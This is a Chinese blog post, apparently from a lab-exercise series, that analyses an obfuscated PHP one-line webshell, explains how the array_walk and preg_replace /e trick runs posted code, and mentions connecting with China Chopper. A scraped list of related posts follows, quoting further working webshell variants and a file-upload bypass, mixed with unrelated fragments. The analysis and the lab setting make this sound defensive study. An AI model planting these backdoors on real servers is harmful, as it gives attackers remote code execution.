WebShell代码分析溯源(九)

一、一句话变形马样本

<?php $e = $_REQUEST[‘e‘];$arr = array($_POST[‘pass‘] => ‘|.*|e‘,);array_walk($arr, $e, ‘‘);?>

二、代码分析

1、调整代码格式

  

2、分析代码

1、首先使用REQUEST方法接收url中的e参数的值,创建arr数组,然后array_walk对数组$arr中的每个元素应用用户自定义函数$e

注:,array_walk() 函数对数组中的每个元素应用用户自定义函数。在函数中,数组的键名和键值是参数。

参考: https://www.w3school.com.cn/php/func_array_walk.asp

2、此时看到’|.*|e’,首先想到的是正则表达式,使用preg_replace()函数, preg_replace() 将 replacement 参数当作 PHP 代码,正则意思为匹配模式出现/e修正符,后面的replacement就会被当作php代码执行, 这样就可以把 $_POST[‘pass‘]构造运行,此时一句话木马就变成了<?php preg_replace(“|.*|e”, $_POST[‘pass‘],’’);?>

三、漏洞环境搭建

1、这里使用在线学习平台墨者学院中的实验环境(WebShell代码分析溯源(第8题)),地址: https://www.mozhe.cn/bug/detail/ckhySG9DdFJPMlcrRndCZGlUMzMvUT09bW96aGUmozhe

2、代码环境,下载代码

  

3、分析(上面已经分析过了)

4、使用菜刀连接

  

5、执行一些命令

  

原文地址:https://www.cnblogs.com/yuzly/p/11751634.html

时间: 2024-10-08 14:04:02

WebShell代码分析溯源(九)的相关文章

WebShell代码分析溯源(二)

一.一句话变形马样本 <?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?> 二.代码分析 1.调整代码格式 2.分析代码,首先先把”assert”字符串复制给POST数组,然后又把POST数组array数组,调试代码,搭建php环境(这里使用phpstudy) 3.发现结果输出为assert 4.这样最终一句话变形马就变成这样: <?php assert($_POST['ass

WebShell代码分析溯源(五)

一.一句话变形马样本 <?php $e=$_REQUEST['e'];$arr=array($_POST['POST'],);array_filter($arr,base64_decode($e)); ?> 二.代码分析 1.调整代码格式 2.分析代码 首先使用REQUEST方法接收url中e参数传递的值,然后把$_POST['POST']赋值给arr数组,然后把arr数组中的每个键值传给base64_decode函数,最终构成一句话木马assert($_post['post']) 注: ar

WebShell代码分析溯源(十一)

一.一句话变形马样本 <?php $e = $_REQUEST['e'];declare(ticks=1);register_tick_function ($e, $_REQUEST['GET']);?> 二.代码分析 1.调整代码格式 2.分析代码 2.1.首先使用REQUEST方法接收url中e参数传递的值, 然后执行declare函数和register_tick_function回调函数.没执行ticks=1行代码,就执行一次register_tick_function函数中的代码. 注

WebShell代码分析溯源(四)

一.一句话变形马样本 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-&q

WebShell代码分析溯源(第2题)

<?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?> assert,是php代码执行函数,与eval()有同样的功能,assert()函数中参数为表达式 (或者为函数) 因为$array[], POST[]都是数组,所以$array[]=$POST,就是把$POST数组的值赋给$array数组 这样的话$array[0]['POST']的输出就是assert,所以组成了一句话木马 &

PHP代码分析溯源(第1题)

靶场地址:https://www.mozhe.cn/bug/detail/UW5xcFhsWE05akxJYjB1TzEyM2p3UT09bW96aGUmozhe 靶场显示一段PHP源码,经分析: 1."^"为异或运算符.在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串. 2.$++;这行代码的意思是对变量名为""的变量进行自增操作,在PHP中未定义的变量默认值为null,null==false==0,可以在不

stout代码分析之九:c++11容器新特性

stout大量使用了c++11的一些新特性,使用这些特性有利于简化我们的代码,增加代码可读性.以下将对一些容器的新特性做一个总结.主要两方面: 容器的初始化,c++11中再也不用手动insert或者push_back来初始化了 容器的遍历,c++11中再也不用使用冗长的迭代器遍历了 让我们一睹为快吧: #include <map> #include <string> #include <iostream> #include <vector> int main

1.5 webshell文件上传漏洞分析溯源(1~4)

webshell文件上传漏洞分析溯源(第一题) 我们先来看基础页面: 先上传1.php ---->   ,好吧意料之中 上传1.png  ---->   我们查看页面元素 ----->   ,也没有前端验证 看来只能用burp抓包来改包绕过,我们修改1.php  ---->   1.php .png ,然后上传抓包改包 0x20 -----> 0x00 webshell文件上传漏洞分析溯源(第一题) 我们先来看基础页面: 先上传1.php ---->   ,好吧意料之中

u-boot分析(九)----nand flash初始化|nand flash读写分析

u-boot分析(九) 上篇博文我们按照210的启动流程,分析到了初始化串口,由于接下来的取消存储保护不是很重要,所以我们今天按照u-boot的启动流程对nand flash初始化进行分析. 今天我们会用到的文档: 1.        2440芯片手册:http://download.csdn.net/detail/wrjvszq/8358949 2.        6410芯片手册:http://download.csdn.net/detail/wrjvszq/8358965 3.